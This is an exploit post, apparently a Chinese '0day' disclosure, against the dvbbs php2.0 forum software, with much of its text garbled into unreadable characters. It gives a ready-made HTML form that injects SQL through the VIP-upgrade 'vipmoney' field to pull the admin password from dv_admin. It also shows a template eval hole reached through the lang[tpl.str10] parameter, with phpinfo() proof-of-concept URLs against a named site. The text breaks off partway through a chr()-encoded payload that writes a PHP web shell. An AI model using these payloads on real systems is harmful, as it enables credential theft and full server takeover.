dvbbs php2.0 joinvipgroup.phpע0day

[dvbbs php2.0 joinvipgroup.phpע0day ȫ]
1,joinvipgroup.php  //ע



Code:
function up_vipuser(){
global $lang,$db,$dv,$userid,$userinfo,$vipgroupuser;
$groupid=$_POST[''vipgroupid''];
$btype=$_POST[''Btype''];
$vipmoney=$_POST[''vipmoney''];
$vipticket=$_POST[''vipticket''];
if($groupid==0 or $vipmoney<0 or $vipticket<0){echo "@@";
   showmsg($lang[''join.info4'']);
   exit;
}
$issql=$db->scalar("SELECT count(1) FROM {$dv}usergroups WHERE parentgid=5 and usergroupid=''".intval($groupid)."''");echo $issql;
if($issql>0 AND ($sql=$db->query("SELECT usergroupid,title,usertitle,groupsetting,grouppic FROM {$dv}usergroups WHERE parentgid=5 and usergroupid=''".intval($groupid)."''"))){
   while ($arr=$db->fetch_array($sql)){
    $vipgroupsetting=explode(",",$arr[''groupsetting'']);
    $upsetting=explode($lang[''join.separator1''], $vipgroupsetting[71]);//'' ȯЧ
    if($btype==1){echo "???";
     $vipmoney=0;
     if(intval($upsetting[3])>0){
      $mustnum=$upsetting[3]*$upsetting[1]/$upsetting[2];
      if($mustnum>0){
       $mustnum=number_format($mustnum,0);
      }else{
       showmsg($lang[''join.info5'']);
       exit;
      }
     }
     if($userinfo[''userticket'']<$vipticket or $vipticket<$mustnum){
      showmsg($lang[''join.info6'']);
      exit;
     }
     $updats=$vipticket*$upsetting[2]/$upsetting[1];
     $updats=intval(number_format($updats,0));
    }else{echo "&&&";
     $vipticket=0;
     if($upsetting[3]>0){
      $mustnum=$upsetting[3]*$upsetting[0]/$upsetting[2];
      if($mustnum>0){
       $mustnum=number_format($mustnum,0);
      }else{
       showmsg($lang[''join.info5'']);
       exit;
      }
     }
                                 var_dump($userinfo[''usermoney'']<$vipmoney);
                                 
                                   var_dump($vipmoney<$mustnum);
                                    
     if($userinfo[''usermoney'']<$vipmoney || $vipmoney<$mustnum){echo "ri";
      showmsg($lang[''join.info7'']);
      exit;
     }
     $updats=$vipmoney*$upsetting[2]/$upsetting[0];
     $updats=intval(number_format($updats,0));
    }
    if($vipgroupuser===true){echo "%%%";
     $db->query("UPDATE {$dv}user SET usergroupid=".$groupid.",userclass=''".$arr[''usertitle'']."'',titlepic=''".$arr[''grouppic'']."'',usermoney=usermoney-".$vipmoney.",userticket=userticket-".$vipticket.",vip_endtime=''".($userinfo[''vip_endtime'']+$updates*24*3600)."'' WHERE userid=".$userid."");
     $db->query("UPDATE {$dv}online SET usergroupid=''$groupid'' Where userid=$userid");
    }else{echo "^^^";
     $db->query("UPDATE {$dv}user SET usergroupid=".$groupid.",userclass=''".$arr[''usertitle'']."'',titlepic=''".$arr[''grouppic'']."'',usermoney=usermoney-".$vipmoney.",userticket=userticket-".$vipticket.",vip_endtime=''".(TIME_NOW+$updates*24*3600)."'',vip_startime=''".TIME_NOW."'' WHERE userid=".$userid."");
     $db->query("UPDATE {$dv}online SET usergroupid=''$groupid'' Where userid=$userid");
    }
              ..............................................................
   $vipmoneyûйˣǰǹԱvipԱ,е:)
<title>test</title><form name="p_form" id="p_form" method="post" action="http://127.1/dvbbs/joinvipgroup.php?action=upvipuser" enctype="multipart/form-data">
<input id=''img_thumb_final'' name=''vipmoney'' type="text" value="0,useremail=123456">
<input id=''img_thumb_final'' name=''vipticket'' type="text" value="88">
<input id=''img_thumb_final'' name=''vipgroupid'' type="text" value="25">
<input id=''img_thumb_final'' name=''Btype'' type="text" value="">
<input name="sub" type="submit" value="ύ" />
</form>
<!------------
0,userface=(select password from dv_admin where id=1) where userid=1#
!>
   

2,cache/static/index_0_0.php //ִ©
index.php



Code:
if((!$useindexstatic) || (!$useindexstatic_css) || $page>1 || $topicmode>0){
   ....................................
if($useindexstatic_css && $page < 2 && $topicmode==0){
   $this_my_f= ob_get_contents(); //ɻļ
   ob_end_clean();
   to_static_php_file($indexstatic,$this_my_f);
}
   ...................................
}

дɵļeval(),ļûƷ
<? eval(\$lang[''tpl.str10'']=\{$lang[''tpl.str10'']}\;);?>

index_0_0.php?lang[tpl.str10]={${phpinfo()}}

3,templates/default/index.tpl.php //ִ©



Code:
<?
if( !defined(''ISDVBBS'') ){
header(''HTTP/1.0 404 Not Found'');
exit;
}
global $imgurl;
if($useindexstatic)
   echo ''<? eval("\$lang[\''tpl.str10\'']=\"{$lang[\''tpl.str10\'']}\";");?>'';
else
   eval("\$lang[''tpl.str10'']=\"{$lang[''tpl.str10'']}\";");
?>

.
index.php



Code:
   ...........//ʡԲݴ
if((!$useindexstatic) || (!$useindexstatic_css) || $page>1 || $topicmode>0){
if($useindexstatic_css &&$page < 2 && $topicmode==0){
   $useindexstatic= true;
   ob_start();
}
else
   $useindexstatic= false;
include_once INC_PATH.''DV_Encoding.class.php'';
$objenc =& DV_Encoding::GetEncoding($charset);
$lang = load_lang($lang, ''index'' );
          ....................

ҳģ壬ûʼ$lang,ֻҪif($useindexstatic_css &&$page < 2 && $topicmode==0)ܳɹ
:



Code:
http://www.sitedir.com.cn/bbs/index.php?lang[tpl.str10]={${phpinfo()}}
   index.php?lang[tpl.str10]={${phpinfo()}}



Code:
   index.php?lang[tpl.str10]={${eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(120).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(43).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr
